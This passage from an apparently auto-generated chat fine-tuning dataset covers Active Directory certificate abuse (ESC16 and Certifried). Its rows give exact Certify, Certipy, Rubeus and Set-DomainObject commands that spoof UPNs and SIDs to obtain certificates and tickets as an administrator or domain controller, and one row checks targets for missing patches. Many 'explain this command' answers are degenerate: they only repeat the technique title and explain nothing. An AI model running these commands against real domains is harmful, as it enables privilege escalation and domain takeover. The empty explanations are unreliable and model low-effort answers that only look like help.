access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Certificate templates - (ESC16 A) Compatibility mode"}, {"role": "assistant", "content": "Certify.exe request /ca:'domain\\ca' /template:\"Vulnerable template\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Certificate templates - (ESC16 A) Compatibility mode", "response": "Certify.exe request /ca:'domain\\ca' /template:\"Vulnerable template\"", "metadata": {"corpus_index": 143, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Certify.exe request /ca:'domain\\ca' /template:\"Vulnerable template\"`?"}, {"role": "assistant", "content": "This command is used for certificate templates - (esc16 a) compatibility mode. (ESC16 A) Compatibility mode"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Certify.exe request /ca:'domain\\ca' /template:\"Vulnerable template\"`?", "response": "This command is used for certificate templates - (esc16 a) compatibility mode. (ESC16 A) Compatibility mode", "metadata": {"corpus_index": 143, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the Set-DomainObject syntax for certificate templates - (esc16 a) compatibility mode?"}, {"role": "assistant", "content": "Set-DomainObject victim -Set @{'userPrincipalName'='victim@corp.local'} -Verbose"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the Set-DomainObject syntax for certificate templates - (esc16 a) compatibility mode?", "response": "Set-DomainObject victim -Set @{'userPrincipalName'='victim@corp.local'} -Verbose", "metadata": {"corpus_index": 144, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Set-DomainObject"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Certificate templates - (ESC16 A) Compatibility mode?"}, {"role": "assistant", "content": "Set-DomainObject victim -Set @{'userPrincipalName'='victim@corp.local'} -Verbose"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Certificate templates - (ESC16 A) Compatibility mode?", "response": "Set-DomainObject victim -Set @{'userPrincipalName'='victim@corp.local'} -Verbose", "metadata": {"corpus_index": 144, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Set-DomainObject victim -Set @{'userPrincipalName'='victim@corp.local'} -Verbose`?"}, {"role": "assistant", "content": "This command is used for certificate templates - (esc16 a) compatibility mode. (ESC16 A) Compatibility mode"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Set-DomainObject victim -Set @{'userPrincipalName'='victim@corp.local'} -Verbose`?", "response": "This command is used for certificate templates - (esc16 a) compatibility mode. (ESC16 A) Compatibility mode", "metadata": {"corpus_index": 144, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the Rubeus.exe syntax for certificate templates - (esc16 a) compatibility mode?"}, {"role": "assistant", "content": "Rubeus.exe asktgt /getcredentials /certificate:\"BASE64_CERTIFICATE\" /password:\"CERTIFICATE_PASSWORD\" /domain:\"DOMAIN\" /dc:\"DOMAIN_CONTROLLER\" /show"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the Rubeus.exe syntax for certificate templates - (esc16 a) compatibility mode?", "response": "Rubeus.exe asktgt /getcredentials /certificate:\"BASE64_CERTIFICATE\" /password:\"CERTIFICATE_PASSWORD\" /domain:\"DOMAIN\" /dc:\"DOMAIN_CONTROLLER\" /show", "metadata": {"corpus_index": 145, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Rubeus.exe"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Certificate templates - (ESC16 A) Compatibility mode?"}, {"role": "assistant", "content": "Rubeus.exe asktgt /getcredentials /certificate:\"BASE64_CERTIFICATE\" /password:\"CERTIFICATE_PASSWORD\" /domain:\"DOMAIN\" /dc:\"DOMAIN_CONTROLLER\" /show"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Certificate templates - (ESC16 A) Compatibility mode?", "response": "Rubeus.exe asktgt /getcredentials /certificate:\"BASE64_CERTIFICATE\" /password:\"CERTIFICATE_PASSWORD\" /domain:\"DOMAIN\" /dc:\"DOMAIN_CONTROLLER\" /show", "metadata": {"corpus_index": 145, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Rubeus.exe asktgt /getcredentials /certificate:\"BASE64_CERTIFICATE\" /password:\"CERTIFICATE_PASSWORD\" /domain:\"DOMAIN\" /dc:\"DOMAIN_CONTROLLER\" /show`?"}, {"role": "assistant", "content": "This command is used for certificate templates - (esc16 a) compatibility mode. (ESC16 A) Compatibility mode"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Rubeus.exe asktgt /getcredentials /certificate:\"BASE64_CERTIFICATE\" /password:\"CERTIFICATE_PASSWORD\" /domain:\"DOMAIN\" /dc:\"DOMAIN_CONTROLLER\" /show`?", "response": "This command is used for certificate templates - (esc16 a) compatibility mode. (ESC16 A) Compatibility mode", "metadata": {"corpus_index": 145, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Certificate templates - (ESC16 B) Full enforcement work?"}, {"role": "assistant", "content": "In this scenario, the DC's StrongCertificateBindingEnforcement attribute is set to 2, meaning the KDC will verify the SID present in the certificate's security extension. \nIf the CA is vulnerable to ESC6, the SID can be manipulated directly in the SAN field of the certificate request, bypassing the enforcement policy.\n\nTo conduct this scenario, the following additional prerequisites must be met:\n> [!WARNING]\n> * For PKINIT, StrongCertificateBindingEnforcement is set to 2\n> * CA vulnerable to ESC6\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Certipy can be used to request a certificate with a specific UPN and SID. As the whole CA is vulnerable to ESC16, any certificate template can be used to enroll at, for example, the User template.\n\n``bash\ncertipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$TARGET\" -ca \"$CA\" -template \"User\" -upn \"administrator@$DOMAIN\" -sid \"$ADMIN_SID\"\n`\n\nThe certificate can then be used with Pass-the-Certificate to obtain a TGT and authenticate as the target.\n\n> [!NOTE]\n> * In the case where StrongCertificateBindingEnforcement is set to 0 or 1, only the UPN must be modified in the SAN.\n\n=== Windows\n\nFrom Windows, Certify can be used to request a certificate with a specific UPN and SID. As the whole CA is vulnerable to ESC16, any certificate template can be used to enroll at, for example, the User template.\n\n`powershell\n./Certify.exe request /ca:SERVER\\CA /template:User /altname:administrator /url:tag:microsoft.com,2007-09-14:sid:\n`\n\nThe certificate can then be used with Pass-the-Certificate to obtain a TGT and authenticate as the target.\n\n> [!NOTE]\n> * In the case where StrongCertificateBindingEnforcement is set to 0 or 1, only the UPN must be modified in the SAN`.\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Certificate templates - (ESC16 B) Full enforcement work?", "response": "In this scenario, the DC's StrongCertificateBindingEnforcement attribute is set to 2, meaning the KDC will verify the SID present in the certificate's security extension. \nIf the CA is vulnerable to ESC6, the SID can be manipulated directly in the SAN field of the certificate request, bypassing the enforcement policy.\n\nTo conduct this scenario, the following additional prerequisites must be met:\n> [!WARNING]\n> * For PKINIT, StrongCertificateBindingEnforcement is set to 2\n> * CA vulnerable to ESC6\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Certipy can be used to request a certificate with a specific UPN and SID. As the whole CA is vulnerable to ESC16, any certificate template can be used to enroll at, for example, the User template.\n\n``bash\ncertipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$TARGET\" -ca \"$CA\" -template \"User\" -upn \"administrator@$DOMAIN\" -sid \"$ADMIN_SID\"\n`\n\nThe certificate can then be used with Pass-the-Certificate to obtain a TGT and authenticate as the target.\n\n> [!NOTE]\n> * In the case where StrongCertificateBindingEnforcement is set to 0 or 1, only the UPN must be modified in the SAN.\n\n=== Windows\n\nFrom Windows, Certify can be used to request a certificate with a specific UPN and SID. As the whole CA is vulnerable to ESC16, any certificate template can be used to enroll at, for example, the User template.\n\n`powershell\n./Certify.exe request /ca:SERVER\\CA /template:User /altname:administrator /url:tag:microsoft.com,2007-09-14:sid:\n`\n\nThe certificate can then be used with Pass-the-Certificate to obtain a TGT and authenticate as the target.\n\n> [!NOTE]\n> * In the case where StrongCertificateBindingEnforcement is set to 0 or 1, only the UPN must be modified in the SAN`.\n\n:::", "metadata": {"corpus_index": 146, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Certificate templates - (ESC16 B) Full enforcement"}, {"role": "assistant", "content": "In this scenario, the DC's StrongCertificateBindingEnforcement attribute is set to 2, meaning the KDC will verify the SID present in the certificate's security extension. \nIf the CA is vulnerable to ESC6, the SID can be manipulated directly in the SAN field of the certificate request, bypassing the enforcement policy.\n\nTo conduct this scenario, the following additional prerequisites must be met:\n> [!WARNING]\n> * For PKINIT, StrongCertificateBindingEnforcement is set to 2\n> * CA vulnerable to ESC6\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Certipy can be used to request a certificate with a specific UPN and SID. As the whole CA is vulnerable to ESC16, any certificate template can be used to enroll at, for example, the User template.\n\n``bash\ncertipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$TARGET\" -ca \"$CA\" -template \"User\" -upn \"administrator@$DOMAIN\" -sid \"$ADMIN_SID\"\n`\n\nThe certificate can then be used with Pass-the-Certificate to obtain a TGT and authenticate as the target.\n\n> [!NOTE]\n> * In the case where StrongCertificateBindingEnforcement is set to 0 or 1, only the UPN must be modified in the SAN.\n\n=== Windows\n\nFrom Windows, Certify can be used to request a certificate with a specific UPN and SID. As the whole CA is vulnerable to ESC16, any certificate template can be used to enroll at, for example, the User template.\n\n`powershell\n./Certify.exe request /ca:SERVER\\CA /template:User /altname:administrator /url:tag:microsoft.com,2007-09-14:sid:\n`\n\nThe certificate can then be used with Pass-the-Certificate to obtain a TGT and authenticate as the target.\n\n> [!NOTE]\n> * In the case where StrongCertificateBindingEnforcement is set to 0 or 1, only the UPN must be modified in the SAN`.\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Certificate templates - (ESC16 B) Full enforcement", "response": "In this scenario, the DC's StrongCertificateBindingEnforcement attribute is set to 2, meaning the KDC will verify the SID present in the certificate's security extension. \nIf the CA is vulnerable to ESC6, the SID can be manipulated directly in the SAN field of the certificate request, bypassing the enforcement policy.\n\nTo conduct this scenario, the following additional prerequisites must be met:\n> [!WARNING]\n> * For PKINIT, StrongCertificateBindingEnforcement is set to 2\n> * CA vulnerable to ESC6\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Certipy can be used to request a certificate with a specific UPN and SID. As the whole CA is vulnerable to ESC16, any certificate template can be used to enroll at, for example, the User template.\n\n``bash\ncertipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$TARGET\" -ca \"$CA\" -template \"User\" -upn \"administrator@$DOMAIN\" -sid \"$ADMIN_SID\"\n`\n\nThe certificate can then be used with Pass-the-Certificate to obtain a TGT and authenticate as the target.\n\n> [!NOTE]\n> * In the case where StrongCertificateBindingEnforcement is set to 0 or 1, only the UPN must be modified in the SAN.\n\n=== Windows\n\nFrom Windows, Certify can be used to request a certificate with a specific UPN and SID. As the whole CA is vulnerable to ESC16, any certificate template can be used to enroll at, for example, the User template.\n\n`powershell\n./Certify.exe request /ca:SERVER\\CA /template:User /altname:administrator /url:tag:microsoft.com,2007-09-14:sid:\n`\n\nThe certificate can then be used with Pass-the-Certificate to obtain a TGT and authenticate as the target.\n\n> [!NOTE]\n> * In the case where StrongCertificateBindingEnforcement is set to 0 or 1, only the UPN must be modified in the SAN`.\n\n:::", "metadata": {"corpus_index": 146, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the certipy command for certificate templates - (esc16 b) full enforcement"}, {"role": "assistant", "content": "certipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$TARGET\" -ca \"$CA\" -template \"User\" -upn \"administrator@$DOMAIN\" -sid \"$ADMIN_SID\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the certipy command for certificate templates - (esc16 b) full enforcement", "response": "certipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$TARGET\" -ca \"$CA\" -template \"User\" -upn \"administrator@$DOMAIN\" -sid \"$ADMIN_SID\"", "metadata": {"corpus_index": 147, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "certipy"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Certificate templates - (ESC16 B) Full enforcement"}, {"role": "assistant", "content": "certipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$TARGET\" -ca \"$CA\" -template \"User\" -upn \"administrator@$DOMAIN\" -sid \"$ADMIN_SID\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Certificate templates - (ESC16 B) Full enforcement", "response": "certipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$TARGET\" -ca \"$CA\" -template \"User\" -upn \"administrator@$DOMAIN\" -sid \"$ADMIN_SID\"", "metadata": {"corpus_index": 147, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `certipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$TARGET\" -ca \"$CA\" -template \"User\" -upn \"administrator@$DOMAIN\" -sid \"$ADMIN_SID\"`?"}, {"role": "assistant", "content": "This command is used for certificate templates - (esc16 b) full enforcement. (ESC16 B) Full enforcement"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `certipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$TARGET\" -ca \"$CA\" -template \"User\" -upn \"administrator@$DOMAIN\" -sid \"$ADMIN_SID\"`?", "response": "This command is used for certificate templates - (esc16 b) full enforcement. (ESC16 B) Full enforcement", "metadata": {"corpus_index": 147, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the Certify.exe command to certificate templates - (esc16 b) full enforcement"}, {"role": "assistant", "content": "./Certify.exe request /ca:SERVER\\CA /template:User /altname:administrator /url:tag:microsoft.com,2007-09-14:sid:"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the Certify.exe command to certificate templates - (esc16 b) full enforcement", "response": "./Certify.exe request /ca:SERVER\\CA /template:User /altname:administrator /url:tag:microsoft.com,2007-09-14:sid:", "metadata": {"corpus_index": 148, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Certify.exe"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Certificate templates - (ESC16 B) Full enforcement"}, {"role": "assistant", "content": "./Certify.exe request /ca:SERVER\\CA /template:User /altname:administrator /url:tag:microsoft.com,2007-09-14:sid:"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Certificate templates - (ESC16 B) Full enforcement", "response": "./Certify.exe request /ca:SERVER\\CA /template:User /altname:administrator /url:tag:microsoft.com,2007-09-14:sid:", "metadata": {"corpus_index": 148, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `./Certify.exe request /ca:SERVER\\CA /template:User /altname:administrator /url:tag:microsoft.com,2007-09-14:sid:`?"}, {"role": "assistant", "content": "This command is used for certificate templates - (esc16 b) full enforcement. (ESC16 B) Full enforcement"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `./Certify.exe request /ca:SERVER\\CA /template:User /altname:administrator /url:tag:microsoft.com,2007-09-14:sid:`?", "response": "This command is used for certificate templates - (esc16 b) full enforcement. (ESC16 B) Full enforcement", "metadata": {"corpus_index": 148, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Certifried - Theory"}, {"role": "assistant", "content": "Certifried (CVE-2022-26923) is a vulnerability discovered by Oliver Lyak on AD CS that lets a domain-joined user escalate its privileges in the domain.\n\nA domain user creating a computer account obtains the Validated write to DNS host name and Validated write to service principal name permissions (among other rights). Therefore, the user is allowed to change the DNS host name (dNSHostName) and SPN (servicePrincipalName) attributes of the computer account.\n\nComputer accounts (using the Machine template) use the value of the dNSHostName property for authentication. Attempting to change the dNSHostName to match another computer account raises a constraint error.\n\nIn fact, the moment the dNSHostName property is edited, the domain controller makes sure to update the existing SPNs of the account so that the \"hostname\" part of it is updated to the new DNS hostname. If the SPNs already exist for another account in Active Directory, the domain controllers raises the constraint violation.\n\nThe trick found by Oliver goes as follows:\n\n1. clear the SPNs (or at least those that reflect the dNSHostName value, i.e. the ones with fully-qualified hostnames, e.g. HOST/SRV01.DOMAIN.LOCAL)\n2. change to dNSHostName to a target's DNS hostname (e.g. DC.DOMAIN.LOCAL). The constraint violation won't be raised since there won't be any SPN to update\n3. request a certificate for the computer account using the Machine template. The Certificate Authority will use the dNSHostName value for identification and issue a certificate for the Domain Controller.\n4. Authenticate as the DC.\n\nA patch was released in may 2022 to address this vulnerability: more information here and on #certificate-mapping."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Certifried - Theory", "response": "Certifried (CVE-2022-26923) is a vulnerability discovered by Oliver Lyak on AD CS that lets a domain-joined user escalate its privileges in the domain.\n\nA domain user creating a computer account obtains the Validated write to DNS host name and Validated write to service principal name permissions (among other rights). Therefore, the user is allowed to change the DNS host name (dNSHostName) and SPN (servicePrincipalName) attributes of the computer account.\n\nComputer accounts (using the Machine template) use the value of the dNSHostName property for authentication. Attempting to change the dNSHostName to match another computer account raises a constraint error.\n\nIn fact, the moment the dNSHostName property is edited, the domain controller makes sure to update the existing SPNs of the account so that the \"hostname\" part of it is updated to the new DNS hostname. If the SPNs already exist for another account in Active Directory, the domain controllers raises the constraint violation.\n\nThe trick found by Oliver goes as follows:\n\n1. clear the SPNs (or at least those that reflect the dNSHostName value, i.e. the ones with fully-qualified hostnames, e.g. HOST/SRV01.DOMAIN.LOCAL)\n2. change to dNSHostName to a target's DNS hostname (e.g. DC.DOMAIN.LOCAL). The constraint violation won't be raised since there won't be any SPN to update\n3. request a certificate for the computer account using the Machine template. The Certificate Authority will use the dNSHostName value for identification and issue a certificate for the Domain Controller.\n4. Authenticate as the DC.\n\nA patch was released in may 2022 to address this vulnerability: more information here and on #certificate-mapping.", "metadata": {"corpus_index": 149, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certifried.md", "page_title": "Certifried", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Certifried - Theory"}, {"role": "assistant", "content": "Certifried (CVE-2022-26923) is a vulnerability discovered by Oliver Lyak on AD CS that lets a domain-joined user escalate its privileges in the domain.\n\nA domain user creating a computer account obtains the Validated write to DNS host name and Validated write to service principal name permissions (among other rights). Therefore, the user is allowed to change the DNS host name (dNSHostName) and SPN (servicePrincipalName) attributes of the computer account.\n\nComputer accounts (using the Machine template) use the value of the dNSHostName property for authentication. Attempting to change the dNSHostName to match another computer account raises a constraint error.\n\nIn fact, the moment the dNSHostName property is edited, the domain controller makes sure to update the existing SPNs of the account so that the \"hostname\" part of it is updated to the new DNS hostname. If the SPNs already exist for another account in Active Directory, the domain controllers raises the constraint violation.\n\nThe trick found by Oliver goes as follows:\n\n1. clear the SPNs (or at least those that reflect the dNSHostName value, i.e. the ones with fully-qualified hostnames, e.g. HOST/SRV01.DOMAIN.LOCAL)\n2. change to dNSHostName to a target's DNS hostname (e.g. DC.DOMAIN.LOCAL). The constraint violation won't be raised since there won't be any SPN to update\n3. request a certificate for the computer account using the Machine template. The Certificate Authority will use the dNSHostName value for identification and issue a certificate for the Domain Controller.\n4. Authenticate as the DC.\n\nA patch was released in may 2022 to address this vulnerability: more information here and on #certificate-mapping."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Certifried - Theory", "response": "Certifried (CVE-2022-26923) is a vulnerability discovered by Oliver Lyak on AD CS that lets a domain-joined user escalate its privileges in the domain.\n\nA domain user creating a computer account obtains the Validated write to DNS host name and Validated write to service principal name permissions (among other rights). Therefore, the user is allowed to change the DNS host name (dNSHostName) and SPN (servicePrincipalName) attributes of the computer account.\n\nComputer accounts (using the Machine template) use the value of the dNSHostName property for authentication. Attempting to change the dNSHostName to match another computer account raises a constraint error.\n\nIn fact, the moment the dNSHostName property is edited, the domain controller makes sure to update the existing SPNs of the account so that the \"hostname\" part of it is updated to the new DNS hostname. If the SPNs already exist for another account in Active Directory, the domain controllers raises the constraint violation.\n\nThe trick found by Oliver goes as follows:\n\n1. clear the SPNs (or at least those that reflect the dNSHostName value, i.e. the ones with fully-qualified hostnames, e.g. HOST/SRV01.DOMAIN.LOCAL)\n2. change to dNSHostName to a target's DNS hostname (e.g. DC.DOMAIN.LOCAL). The constraint violation won't be raised since there won't be any SPN to update\n3. request a certificate for the computer account using the Machine template. The Certificate Authority will use the dNSHostName value for identification and issue a certificate for the Domain Controller.\n4. Authenticate as the DC.\n\nA patch was released in may 2022 to address this vulnerability: more information here and on #certificate-mapping.", "metadata": {"corpus_index": 149, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certifried.md", "page_title": "Certifried", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Certifried - Detecting unpatched targets?"}, {"role": "assistant", "content": "Requesting a certificate based on the Machine (or User) template can indicate whether the patch has been applied or not. If the certificate object contains an SID (objectSid), then the patch has been applied.\n\n::: tabs\n\n=== UNIX-like\n\nThis check can be conducted using Certipy (Python).\n\n``bash\ncertipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'User'\n`\n\nIf Certipy doesn't print Certificate object SID is [...]` after obtaining the certificate, then the attack can be conducted.\n\n> [!WARNING]\n> Oliver underlined the fact that to fully mitigate the vulnerability, both the KDC and the CA server must be patched.\n\n=== Windows\n\n_At the time of writing this recipe (June 2022), no Windows alternative has been found._\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Certifried - Detecting unpatched targets?", "response": "Requesting a certificate based on the Machine (or User) template can indicate whether the patch has been applied or not. If the certificate object contains an SID (objectSid), then the patch has been applied.\n\n::: tabs\n\n=== UNIX-like\n\nThis check can be conducted using Certipy (Python).\n\n``bash\ncertipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'User'\n`\n\nIf Certipy doesn't print Certificate object SID is [...]` after obtaining the certificate, then the attack can be conducted.\n\n> [!WARNING]\n> Oliver underlined the fact that to fully mitigate the vulnerability, both the KDC and the CA server must be patched.\n\n=== Windows\n\n_At the time of writing this recipe (June 2022), no Windows alternative has been found._\n\n:::", "metadata": {"corpus_index": 150, "category": "active_directory", "source_file": 